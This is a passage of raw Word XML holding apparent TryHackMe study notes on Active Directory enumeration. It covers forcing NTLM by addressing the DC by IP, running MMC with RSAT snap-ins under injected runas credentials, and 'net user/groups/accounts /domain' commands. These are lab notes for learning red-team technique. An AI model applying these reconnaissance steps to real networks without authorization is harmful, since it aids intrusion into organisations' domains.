      </w:r>
      <w:r w:rsidRPr="00637BAC">
        <w:t>, no matter how low-privileged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55259489" w14:textId="77777777" w:rsidR="006841C5" w:rsidRDefault="006841C5" w:rsidP="006841C5"/>
    <w:p w14:paraId="2161DEC7" w14:textId="172909D1" w:rsidR="00704185" w:rsidRPr="006841C5" w:rsidRDefault="00704185" w:rsidP="00704185">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Important Note (DC-Hostname VS DC-IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CF0005" w14:textId="5F5B6179" w:rsidR="00F61A2B" w:rsidRPr="006841C5" w:rsidRDefault="006841C5" w:rsidP="006841C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006841C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dir \\za.tryhackme.com\SYSVOL and dir \\&lt;DC IP&gt;\SYSVOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDD001" w14:textId="110813D9" w:rsidR="00F61A2B" w:rsidRPr="006841C5" w:rsidRDefault="006841C5" w:rsidP="006841C5">
      <w:r w:rsidRPr="006841C5">
        <w:t xml:space="preserve">When we provide the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57265">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="006841C5">
        <w:t>, network authentication will attempt first to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57265">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Kerberos authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="006841C5">
        <w:t xml:space="preserve">. Since Kerberos authentication uses hostnames embedded in the tickets, if we provide the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57265">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="006841C5">
        <w:t>instead, we can force the authentication type to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57265">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="006841C5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BA014" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="006841C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27623B42" w14:textId="5A7171D3" w:rsidR="006841C5" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk192949659"/>
      <w:r w:rsidRPr="00DB0C93">
        <w:lastRenderedPageBreak/>
        <w:t>Enumeration through Microsoft Management Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A4BF6E" w14:textId="48C95CA9" w:rsidR="009F2DBB" w:rsidRPr="009F2DBB" w:rsidRDefault="009F2DBB" w:rsidP="009F2DBB">
      <w:r>
        <w:t>Require RDP Connection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="63F98E8B" w14:textId="3B1825FF" w:rsidR="00F61A2B" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>using the Microsoft Management Console (MMC) with the </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DB0C93">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Remote Server Administration Tools'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB0C93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> (RSAT) AD Snap-Ins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E4F240" w14:textId="0BF7EB32" w:rsidR="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>install the Snap-Ins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257CCC64" w14:textId="77CBFAEA" w:rsidR="00DB0C93" w:rsidRPr="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:t>Press Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB9D77E" w14:textId="77777777" w:rsidR="00DB0C93" w:rsidRPr="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:t>Search "Apps &amp; Features" and press enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CDB55" w14:textId="77777777" w:rsidR="00DB0C93" w:rsidRPr="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:t>Click Manage Optional Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C72E8F" w14:textId="77777777" w:rsidR="00DB0C93" w:rsidRPr="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:t>Click Add a feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61520641" w14:textId="77777777" w:rsidR="00DB0C93" w:rsidRPr="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:t>Search for "RSAT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6D171" w14:textId="77777777" w:rsidR="00DB0C93" w:rsidRPr="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB0C93">
        <w:t>Select "RSAT: Active Directory Domain Services and Lightweight Directory Tools" and click Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5AB954" w14:textId="405DB01F" w:rsidR="00DB0C93" w:rsidRDefault="00DB0C93" w:rsidP="00DB0C93">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589C0720" w14:textId="75E460C6" w:rsidR="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>start MMC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> in cmd that we run with (runas command)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, which will ensure that all MMC network connections will use our injected AD credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BAE29F" w14:textId="74894D0A" w:rsidR="00FB4CB9" w:rsidRPr="00DB0C93" w:rsidRDefault="00FB4CB9" w:rsidP="00AC1750">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In cmd that run with domain user just type: mcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B6CAD" w14:textId="427A2FF9" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ttach the AD RSAT Snap-In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In MMC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B5EDC" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Click File -&gt; Add/Remove Snap-in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C30CF8" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Select and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> all three Active Directory Snap-ins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD54111" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Click through any errors and warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022DDAC8" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Right-click on Active Directory Domains and Trusts and select Change Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342EE793" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>za.tryhackme.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> as the Root domain and Click OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676BFBC" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Right-click on Active Directory Sites and Services and select Change Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A644CC" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>za.tryhackme.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> as the Root domain and Click OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA141C" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Right-click on Active Directory Users and Computers and select Change Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD25363" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>za.tryhackme.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> as the Domain and Click OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD5AEF1" w14:textId="77777777" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Right-click on Active Directory Users and Computers in the left-hand pane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A83521" w14:textId="41287EAA" w:rsidR="00F61A2B" w:rsidRPr="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Click on View -&gt; Advanced Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2668902D" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00AC1750">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D514F8" w14:textId="70727EEF" w:rsidR="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1750">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>start enumerating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03518EBB" w14:textId="030CC19A" w:rsidR="00AC1750" w:rsidRDefault="00AC1750" w:rsidP="00AC1750">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FB4CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>see AD Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726B280" w14:textId="77777777" w:rsidR="00FB4CB9" w:rsidRDefault="00FB4CB9" w:rsidP="00AC1750">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA261E7" w14:textId="77777777" w:rsidR="00FB4CB9" w:rsidRDefault="00FB4CB9" w:rsidP="00FB4CB9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="004503F4">
        <w:t>Enumeration through Command Prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65725271" w14:textId="2434D044" w:rsidR="00AC1750" w:rsidRPr="00AC1750" w:rsidRDefault="009F2DBB" w:rsidP="009F2DBB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> command is a handy tool to enumerate information about the local system and AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212EAD83" w14:textId="05AE1A2F" w:rsidR="00F61A2B" w:rsidRDefault="009F2DBB" w:rsidP="009F2DBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
        </w:rPr>
        <w:t>net user /domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>list all users in the AD domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D3792" w14:textId="032F2E4E" w:rsidR="009F2DBB" w:rsidRDefault="009F2DBB" w:rsidP="009F2DBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> /domain:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> info about this user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC5BDD" w14:textId="062D9D6A" w:rsidR="009F2DBB" w:rsidRDefault="009F2DBB" w:rsidP="009F2DBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
        </w:rPr>
        <w:t>net groups /domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: info about groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C681DEE" w14:textId="59E53851" w:rsidR="009F2DBB" w:rsidRDefault="009F2DBB" w:rsidP="009F2DBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
        </w:rPr>
        <w:t>net accounts /domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
